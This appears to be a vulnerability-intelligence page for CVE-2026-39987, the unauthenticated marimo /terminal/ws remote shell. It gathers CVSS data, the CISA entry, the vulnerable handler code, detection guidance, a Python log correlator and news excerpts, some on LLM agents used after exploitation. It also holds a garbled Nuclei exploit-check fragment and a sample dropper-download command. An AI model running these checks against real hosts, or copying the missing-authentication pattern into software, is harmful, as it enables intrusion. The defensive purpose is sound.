CVE-2026-39987
Published 2026-04-09
Priority: P1 (100) · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, due 2026-05-07
Exploited in the wild
EPSS: 95.64% (99.9th percentile)
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification. This vulnerability is fixed in 0.23.0.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coreweave | marimo | < 0.23.0 | 0.23.0 |
| marimo-team | marimo | < 0.23.0 | 0.23.0 |
| marimo-team | marimo | >= 0 < 0.23.0 | 0.23.0 |
Detection & IOCs (extracted from sources)
- Monitor and alert on unauthenticated WebSocket connections to the /terminal/ws endpoint; legitimate Marimo deployments should require authentication via validate_auth() before accepting connections.
- Detect curl commands downloading scripts from Hugging Face Spaces (huggingface.co) immediately following a /terminal/ws WebSocket connection, as this pattern was used to deliver the NKAbuse dropper.
- Hunt for systemd unit creation, cron job additions, or macOS LaunchAgent entries spawned from the Marimo process, as the NKAbuse dropper establishes persistence via these mechanisms.
- Detect rapid sequential AWS Secrets Manager API calls originating from a Marimo host, especially when followed by SSH sessions to a bastion server; this sequence is indicative of LLM-agent-driven post-exploitation.
- Flag command streams containing '---' delimiters between commands with stderr discarded and 'less' disabled, a machine-consumption pattern associated with LLM agent post-exploitation activity.
- Monitor for multiple reverse-shell attempts across different ports originating from a single source IP after /terminal/ws exploitation, as one observed actor attempted 15 reverse-shell techniques across multiple ports.
- Detect PostgreSQL connections and rapid schema/table enumeration initiated from the Marimo process environment, as attackers pivoted to lateral movement by extracting database credentials from environment variables.
- Recorded Future created Nuclei templates to detect CVE-2026-39987 (missing authentication on /terminal/ws); these are available to Recorded Future customers for scanning exposed Marimo instances.
- The vulnerability only affects Marimo instances deployed in edit mode with network exposure; users who expose Marimo to a shared network using --host 0.0.0.0 while in edit mode are at risk.
- All Marimo versions prior to 0.23.0 (specifically 0.20.4 and earlier per exploitation reports) are vulnerable; the fix is exclusively in version 0.23.0 and later.
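As an added example that is not taken from any of the sources above, the following Python correlates the first two detection ideas over constructed log lines: it flags completed WebSocket upgrades to /terminal/ws in a proxy access log and then looks for a curl or wget fetch from huggingface.co starting shortly afterwards. The access-log and process-audit formats are assumptions for the sample, not marimo's own logging.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs. Formats are assumptions (combined-format proxy
# access log; a process-audit 'exec' feed), not marimo's own logging.
ACCESS_LOG = """\
10.0.0.5 - - [12/Apr/2026:09:14:02 +0000] "GET /ws?session_id=abc HTTP/1.1" 101 0
203.0.113.7 - - [12/Apr/2026:09:15:30 +0000] "GET /terminal/ws HTTP/1.1" 101 0
10.0.0.9 - - [12/Apr/2026:09:16:11 +0000] "GET /api/kernel/run HTTP/1.1" 200 512
"""
EXEC_LOG = """\
2026-04-12T09:15:31Z exec pid=4102 ppid=3999 comm=bash cmd="curl -s https://huggingface.co/spaces/example/resolve/main/run.sh -o /tmp/r.sh"
2026-04-12T09:40:00Z exec pid=4200 ppid=1 comm=bash cmd="curl -s https://pypi.org/simple/ -o /dev/null"
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
EXEC_RE = re.compile(r'^(?P<ts>\S+) exec .* cmd="(?P<cmd>[^"]*)"')
HF_FETCH_RE = re.compile(r"\b(curl|wget)\b.*\bhuggingface\.co\b")


def terminal_ws_connections(access_log: str) -> list[dict]:
    """Every completed WebSocket upgrade (HTTP 101) to /terminal/ws.
    On a pre-0.23.0 marimo every such connection is unauthenticated, so each
    one from outside an allow-list is worth an alert on its own."""
    hits = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m and m["path"].split("?", 1)[0] == "/terminal/ws" and m["status"] == "101":
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            hits.append({"ip": m["ip"], "ts": ts})
    return hits


def hf_downloads_after(conns: list[dict], exec_log: str, window_s: int = 300) -> list[str]:
    """curl/wget fetches from huggingface.co that start within window_s seconds
    after any /terminal/ws connection: the delivery pattern of the NKAbuse dropper."""
    flagged = []
    for line in exec_log.splitlines():
        m = EXEC_RE.match(line)
        if not m or not HF_FETCH_RE.search(m["cmd"]):
            continue
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        if any(timedelta(0) <= ts - c["ts"] <= timedelta(seconds=window_s) for c in conns):
            flagged.append(m["cmd"])
    return flagged


if __name__ == "__main__":
    conns = terminal_ws_connections(ACCESS_LOG)
    for c in conns:
        print(f"ALERT /terminal/ws upgrade from {c['ip']} at {c['ts'].isoformat()}")
    for cmd in hf_downloads_after(conns, EXEC_LOG):
        print(f"ALERT huggingface.co fetch shortly after /terminal/ws: {cmd}")
```

The second curl in the sample (to pypi.org, 25 minutes later) is deliberately outside both the domain match and the time window, so only the Hugging Face fetch one second after the upgrade is reported.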
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 4.0 | 9.3 | CRITICAL | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 9.3 | CRITICAL | |
| cisa | | 9.3 | CRITICAL | |
CISA
Marimo Remote Code Execution Vulnerability
cisa·2026-04-23·CVSS 9.3
CVE-2026-39987 [CRITICAL] CWE-306 Marimo Remote Code Execution Vulnerability
Vulnerability: Marimo Remote Code Execution Vulnerability
Affected: Marimo Marimo
Marimo contains a pre-authorization remote code execution vulnerability, allowing an unauthenticated attacker to gain shell access and execute arbitrary system commands.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc ; https://nvd.nist.gov/vuln/detail/CVE-2026-39987
Remediation Due Date: 2026-05-07
VulDB
marimo-team marimo up to 0.22.x WebSocket Endpoint /terminal/ws validate_auth missing authentication
vuldb·2026-04-09·CVSS 9.3
CVE-2026-39987 [CRITICAL] marimo-team marimo up to 0.22.x WebSocket Endpoint /terminal/ws validate_auth missing authentication
A vulnerability, which was classified as critical, has been found in marimo-team marimo up to 0.22.x. This vulnerability affects the function validate_auth of the file /terminal/ws of the component WebSocket Endpoint. This manipulation causes missing authentication.
This vulnerability appears as CVE-2026-39987. The attack may be initiated remotely. There is no available exploit.
It is advisable to upgrade the affected component.
OSV
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
osv·2026-04-08
CVE-2026-39987 [CRITICAL] Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
## Summary
Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint `/terminal/ws` lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.
Unlike other WebSocket endpoints (e.g., `/ws`) that correctly call `validate_auth()` for authentication, the `/terminal/ws` endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.
## Affected Versions
Marimo: all versions prior to 0.23.0.
The `/terminal/ws` handler accepts the connection after only these two checks (the vulnerable code as shipped; the `...` arguments are elided in the advisory):
```python
app_state = AppState(websocket)
# Only the session mode is checked ...
if app_state.mode != SessionMode.EDIT:
    await websocket.close(...)
    return
# ... and platform support. There is no validate_auth() call, unlike /ws.
if not supports_terminal():
    await websocket.close(...)
    return
```
GHSA
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
ghsa·2026-04-08
CVE-2026-39987 [CRITICAL] CWE-306 Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
VulnCheck
Missing Authentication for Critical Function
vulncheck·2026·CVSS 9.3
CVE-2026-39987 [CRITICAL] Missing Authentication for Critical Function
Missing Authentication for Critical Function
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
No detection rules found.
Nuclei
Marimo <= 0.20.4 - Pre-Auth Terminal WebSocket RCE
nuclei·CVSS 9.3
CVE-2026-39987 [CRITICAL] Marimo <= 0.20.4 - Pre-Auth Terminal WebSocket RCE
```yaml
Marimo 0) {
              output += chunk;
            }
            if (output.indexOf("uid=") !== -1) {
              break;
            }
          }
          conn.Close();
          Export(upgradeResp + output);
        }
    args:
      target_host: "{{Host}}"
      target_port: "{{Port}}"
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "uid=\\d+\\([^)]+\\)"
      - type: dsl
        dsl:
          - "success == true"
    extractors:
      - type: regex
        regex:
          - "uid=\\d+\\([^)]+\\)"
# digest: 4a0a00473045022100c6a08283f9ffe53982ee1e7ef08017afcd4df20cf4c2eeceba79652166ff9cb80220529010aab9a093ec0e4f6ab3de329aee2c366e8c771cee5c307714fcb2ee1f0c:922c64590222798bb761d5b6d8e72950
```
Hackernews
Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models
blogs_hackernews·2026-06-09
CVE-2026-39987 Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models
## Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models
University of Toronto researchers have built and tested a proof-of-concept AI-driven computer worm that uses a locally hosted open-weight large language model to reason its way through a network, generate tailored attack strategies for each target it encounters, and replicate itself, all without human intervention and without touching a commercial AI service.
The preprint, posted to arXiv on June 2 and currently under peer review, shows why single-CVE patching breaks down when malware can inspect exposed services, read fresh adviso
Hackernews
Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
blogs_hackernews·2026-05-29·CVSS 9.3
CVE-2026-39987 [CRITICAL] Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
## Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
An unknown threat actor has been observed using a large language model (LLM) agent to conduct post-compromise actions after obtaining initial access following the exploitation of a publicly accessible Marimo network using a recently disclosed vulnerability.
"The attacker compromised an internet-reachable Marimo notebook via CVE-2026-39987, extracted two cloud credentials from the compromised host, replayed them through a fanned-out egress pool to retrieve an SSH private key from AWS Secrets Manager, and used that key to drive eight short SSH se
Recorded Future
April 2026 CVE Landscape
blogs_recorded_future·2026-05-15·CVSS 9.8
CVE-2026-33032 [CRITICAL] April 2026 CVE Landscape
## April 2026 CVE Landscape
In April 2026, Insikt Group® identified 37 high-impact vulnerabilities that should be prioritized for remediation, 35 of which had a Very Critical Recorded Future Risk Score. This represents a 19% increase from last month.
31 of the 37 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, and six were surfaced only through honeypot data. Those six CVEs associated with honeypots are available only to Recorded Future customers.
Those 37 vulnerabilities affected products from 23 vendors. Microsoft accounted for approximately 22%, while the remaining exposure was concentrated across a range of enterprise-facing vendors, particularly security and systems management tools, collaboration and
Bleepingcomputer
Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
blogs_bleepingcomputer·2026-04-16·CVSS 9.3
CVE-2026-39987 [CRITICAL] Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
## Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
## Bill Toulas
Hackers are exploiting a critical vulnerability in Marimo reactive Python notebook to deploy a new variant of NKAbuse malware hosted on Hugging Face Spaces.
Attacks leveraging the remote code execution flaw (CVE-2026-39987) started last week for credential theft, less than 10 hours after technical details were disclosed publicly, according to data from cloud-security company Sysdig.
Sysdig researchers continued to monitor activity related to the security issue and identified additional attacks, including a campaign that started on April 12 that abuses the Hugging Face Spaces platform for showcasing AI applications.
Hugging Face serves as an AI development and machine learning-focused platform, acting
Checkpoint
13th April – Threat Intelligence Report
blogs_checkpoint·2026-04-13
CVE-2026-1340 13th April – Threat Intelligence Report
## 13th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
ChipSoft, a Dutch healthcare sof
Hackernews
⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
blogs_hackernews·2026-04-13·CVSS 8.6
[HIGH] ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
## ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
Monday is back, and the weekend’s backlog of chaos is officially hitting the fan. We are tracking a critical zero-day that has been quietly living in your PDFs for months, plus some aggressive state-sponsored meddling in infrastructure that is finally coming to light. It is one of those mornings where the gap between a quiet shift and a full-blown incident response is basically non-existent.
The variety this week is particularly nasty. We have AI models being turned into autonomous exploit engines, North Korean groups playing the long game
Bleepingcomputer
Critical Marimo pre-auth RCE flaw now under active exploitation
blogs_bleepingcomputer·2026-04-12·CVSS 9.3
CVE-2026-39987 [CRITICAL] Critical Marimo pre-auth RCE flaw now under active exploitation
## Critical Marimo pre-auth RCE flaw now under active exploitation
## Bill Toulas
Hackers started exploiting a critical vulnerability in the Marimo open-source reactive Python notebook platform just 10 hours after its public disclosure.
The flaw allows remote code execution without authentication in Marimo versions 0.20.4 and earlier. It is tracked as CVE-2026-39987 and GitHub assessed it with a critical score of 9.3 out of 10.
According to researchers at cloud-security company Sysdig, attackers created an exploit from the information in the developer's advisory and immediately started using it in attacks that exfiltrated sensitive information.
Marimo is an open-source Python notebook environment, typically used by data scientists, ML/AI practitioners, researchers, and developers buildin
Hackernews
Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
blogs_hackernews·2026-04-10·CVSS 9.3
CVE-2026-39987 [CRITICAL] Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
## Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
A critical security vulnerability in Marimo, an open-source Python notebook for data science and analysis, has been exploited within 10 hours of public disclosure, according to findings from Sysdig.
The vulnerability in question is CVE-2026-39987 (CVSS score: 9.3), a pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including 0.20.4. The issue has been addressed in version 0.23.0.
"The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtai
Wiz
CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-39987 [CRITICAL] CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39987: Python vulnerability analysis and mitigation
Source: NVD
Score: 9.3
Published: April 9, 2026
Severity: CRITICAL
CNA Score: 9.3
Affected Technologies: Python
Has Public Exploit: Yes
Has CISA KEV Ex
References:
https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12a
https://github.com/marimo-team/marimo/pull/9098
https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-39987
https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours
Published: 2026-04-09
Added to CISA KEV: 2026-04-23
Exploited in the wild